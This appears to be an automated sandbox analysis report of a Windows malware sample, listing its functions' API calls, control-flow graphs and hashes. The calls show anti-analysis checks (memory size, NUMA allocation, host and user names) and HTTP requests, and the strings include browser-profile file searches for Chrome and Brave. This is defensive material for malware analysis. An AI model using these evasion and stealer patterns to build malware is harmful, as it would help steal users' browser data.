                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ??2@$CrackInternetlstrlen
                                                                                    • String ID: <
                                                                                    • API String ID: 1683549937-4251816714
                                                                                    • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                                                    • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                                                    • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                                                    • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95
                                                                                    Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1498 401281-401285 1496->1498 1497->1498 1500 401287 1498->1500 1501 40129a-40129d 1498->1501 1503 401292-401294 ExitProcess 1500->1503 1504 401289-401290 1500->1504 1504->1501 1504->1503
                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                    • __aulldiv.LIBCMT ref: 00401258
                                                                                    • __aulldiv.LIBCMT ref: 00401266
                                                                                    • ExitProcess.KERNEL32 ref: 00401294
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 3404098578-2766056989
                                                                                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                    • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                                                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                    • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D
                                                                                    Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1517 416af5-416b04 CloseHandle Sleep 1510->1517 1518 416ad9-416af1 call 41aad0 CreateEventA 1510->1518 1517->1508 1518->1511
                                                                                    APIs
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02E342B0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                                                    • Sleep.KERNEL32(00001770), ref: 00416B04
                                                                                    • CloseHandle.KERNEL32(?,00000000,?,02E342B0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                                                    • ExitProcess.KERNEL32 ref: 00416B22
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                    • String ID:
                                                                                    • API String ID: 941982115-0
                                                                                    • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                                                    • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                                                    • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                                                    • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                                                                    Function 004151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                                                      • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02E35CA0), ref: 00406303
                                                                                      • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                                      • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02E3AE58,00000000,00000000,00400100,00000000), ref: 00406385
                                                                                      • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                                                      • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                    • String ID: ERROR$ERROR
                                                                                    • API String ID: 3287882509-2579291623
                                                                                    • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                                                    • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                                                    • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                                                    • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                                                    Function 004178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocComputerNameProcess
                                                                                    • String ID:
                                                                                    • API String ID: 4203777966-0
                                                                                    • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                                                    • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                                                    • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                                                    • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                                                    Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                                                    • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                                                    • ExitProcess.KERNEL32 ref: 00401143
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1103761159-0
                                                                                    • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                                                    • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                                                    • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                                                    • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                                                    Function 02E0A1DE Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E0A206
                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 02E0A226
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054499794.0000000002E09000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E09000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2e09000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 3833638111-0
                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                    • Instruction ID: 3b8f8fb239844d721e86dae0ded23092d315b8942027d1ebd459176c088aa2a8
                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                    • Instruction Fuzzy Hash: DCF0C2321807146BD7203AF49CCCFAA72E8AF49628F205538EB46911C0DB70E8864A60
                                                                                    Function 02D10E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000400,?,?,02D10223,?,?), ref: 02D10E19
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,02D10223,?,?), ref: 02D10E1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                    • Instruction ID: fe185a62a02c14c90e097e00a0269c1189d12346271cb14313f70f45d1455235
                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                    • Instruction Fuzzy Hash: 20D0123114512877DB003A95DC09BCD7B1CDF05B67F008011FB0DD9580C770994046E5
                                                                                    Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 2087232378-0
                                                                                    • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                                                    • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                                                    • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                                                    • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                                                    Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                                                      • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                                                      • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                                      • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                                                      • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                                                      • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                                    • ExitProcess.KERNEL32 ref: 004011C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                    • String ID:
                                                                                    • API String ID: 1004333139-0
                                                                                    • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                                                    • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                                                    • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                                                    • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                                                    Function 02E09E9D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02E09EEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054499794.0000000002E09000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E09000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2e09000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction ID: 52a680a6d6074e4487cacb0894115f9d8f39203262b5968be776756f8f148f2f
                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction Fuzzy Hash: D0112D79A40208EFDB01DF98C985E99BBF5AF08750F058094F9489B362D371EA90DF90

                                                                                    Non-executed Functions

                                                                                    Function 004138B0 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 004138CC
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                                                    • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                                                    • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                                                    • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                                                    • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                    • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                    • API String ID: 1125553467-817767981
                                                                                    • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                                                    • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                                                    • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                                                    • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                                                    Function 0040BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                                                                    • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                                                                    • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                    • API String ID: 3334442632-726946144
                                                                                    • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                                                    • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                                                                    • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                                                    • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                                                                    Function 00414910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 0041492C
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                    • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                    • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                    • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                    • API String ID: 180737720-445461498
                                                                                    • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                                                    • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                                                    • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                                                    • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                                                                    Function 02D23B17 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 02D23B33
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02D23B4A
                                                                                    • lstrcat.KERNEL32(?,?), ref: 02D23B9C
                                                                                    • StrCmpCA.SHLWAPI(?,00420F70), ref: 02D23BAE
                                                                                    • StrCmpCA.SHLWAPI(?,00420F74), ref: 02D23BC4
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D23ECE
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D23EE3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1125553467-0
